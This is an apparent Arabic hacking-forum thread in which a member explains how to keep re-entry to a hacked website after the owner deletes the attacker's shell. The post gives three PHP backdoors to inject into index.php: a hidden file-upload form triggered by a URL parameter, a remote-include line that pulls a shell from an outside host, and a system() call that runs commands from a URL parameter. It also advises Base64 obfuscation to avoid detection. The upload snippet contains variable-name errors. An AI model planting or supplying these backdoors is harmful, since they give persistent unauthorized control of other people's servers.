اشترك في قناتنا ليصلك جديدنا

اشترك في قناتنا على اليوتيوب ليصلك جديدنا

كذلك الاعجاب بصفحتنا على الفيسبوك

استعادة الشل الخاص بك بعد استعادة الموقع

استعادة الشل الخاص بك بعد استعادة الموقع


النتائج 1 إلى 2 من 2

الموضوع: استعادة الشل الخاص بك بعد استعادة الموقع

  1. #1
    هكر نشيط Array الصورة الرمزية hacker@dz
    تاريخ التسجيل
    Oct 2013
    الدولة
    no ip
    المشاركات
    195

    Come استعادة الشل الخاص بك بعد استعادة الموقع



    السلام عليكم
    الكثير منا يعاني بعد اختراقه لسيرفر ما من أن يتم حذف الشل الخاص به و كما نعلم أن الشل هو سكريبت برمجي يسمح و يسهل عملية التحكم بالموقع المخترق أي التنقل , التعديل و الحذف .....
    و بعد أن تريد اخترقه مجددا تجد أن الثغرة قد تم اقفالها !
    +++++++++++++++++++++++
    اذا ما الحل ؟
    توجد العديد من الطرق لتلغيم الموقع لتتمكن من العودة اليه مجددا
    +++++++++++++++++++++++
    -أولا : مركز رفع خفي حيث نقوم بوضع المتغير id=dz و هو الذي يقوم باظهار مركز الرفع على الموقع , حيث نفترض أننا حقنا ملف index.php بالكود أسفله ليصبح الاستغلال هكذا : http://site.com/index.php?id=dz
    الكود :
    <?php
    $id = $_GET['id'];
    if($ids == 'dz'){
    $anondz = $_FILES['file']['name'];
    $anonymousdz = $_FILES['file']['tmp_name'];
    echo "<form method='POST' enctype='multipart/form-data'>
    <input type='file'name='file' />
    <input type='submit' value='upload shell' />
    </form>";
    move_uploaded_file($anonymousdz,$anondzl);
    }
    ?>
    ++++++++++++++++++++++
    -ثانيا : استخدام دالة احضار ملفات خارجية , يعني أننا سوف نقوم باحضار ملف شل خارجي من موقع ما بمجرد وضع الرابط الخاص به
    مثلا حقنا الكود في ملف index.php
    http://site.com/index.php?id=http://black.com/shell.php
    أي أننا نقوم برفع الشل برابط مباشر باسخدام المتغير
    الكود :
    <?php
    $dz=$_GET['id'];
    include $dz;
    +++++++++++++++++++++++
    -ثالثا : استخدام دالة تنفيذ الأوامر من خلال الدالة System
    أي يمكننا هذا الكود من تنفيذ الأوامر على السيرفر , مثلا نحقن الملف index.php بالكود أسفله , فيمكن تنفيذ الأوامر هكذا :
    http://site.com/index.php?dz=id
    هكذا وضعنا الأمر id بعد المتغير "dz" طبعا id تعطينا صلاحياتنا على السيرفر
    الكود :
    <?php
    $anonymous=$_GET['dz'];
    system($anonymous);
    ?>
    +++++++++++++++++++++++
    ملاحظات :
    -طبعا تلغيم الملفات باحدى هذه الأوامر يتم في ظل اختراقك للسيرفر و امتلاكك لشل عليه لتقوم بعملية اضافة الأكواد
    - يتعين عليك تشفير الأكواد باستعمال خوارزميات Base64 لكي لا يتم كشفها حيث يمكنك ايجاد مواقع تقوم بالعمل
    ++++++++++++++++++++++++
    أرجوا ان أكون قد أفتدكم

    التعديل الأخير تم بواسطة [email protected] ; 05-09-2015 الساعة 01:38 AM


  2. #2
    :: مراقب عام :: Array الصورة الرمزية shhaby
    تاريخ التسجيل
    Nov 2012
    المشاركات
    3,233

    افتراضي رد: استعادة الشل الخاص بك بعد استعادة الموقع

    موضوع رائع من عضو رائع ... بالتوفيق


المواضيع المتشابهه

  1. استعادة الملفات , استعادة الملفات المحذوفه
    بواسطة ASDELY-ScOrPiOn في المنتدى منتدى البرامج - تحميل برامج
    مشاركات: 81
    آخر مشاركة: 12-25-2012, 05:09 AM
  2. استعادة الملفات المحذوفة , برنامج استعادة الملفات
    بواسطة Hidden pain في المنتدى منتدى البرامج - تحميل برامج
    مشاركات: 0
    آخر مشاركة: 07-02-2012, 01:04 AM
  3. كيفية استعادة الايميلhotmail
    بواسطة معتز سرطاوي في المنتدى قسم المشاكل والإستفسارات
    مشاركات: 4
    آخر مشاركة: 02-12-2012, 07:56 PM
  4. تم القصف المميز ارفع الشل الخاص بك و اخترق الموقع (xx(-
    بواسطة SOUrRce-x في المنتدى معرض الانجازات
    مشاركات: 8
    آخر مشاركة: 10-17-2011, 03:46 PM
  5. استعادة الباسوورد في Windows 7
    بواسطة reda sarese في المنتدى منتدى الصيانة وتبادل الخبرات
    مشاركات: 8
    آخر مشاركة: 06-29-2011, 01:55 AM

وجد الزوار هذه الصفحة بالبحث عن:

كيفية تلغيم سيرفر للعودة اليه مجددا

الشل

ايه احسن زيت فى زيت الشل

الالشل

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •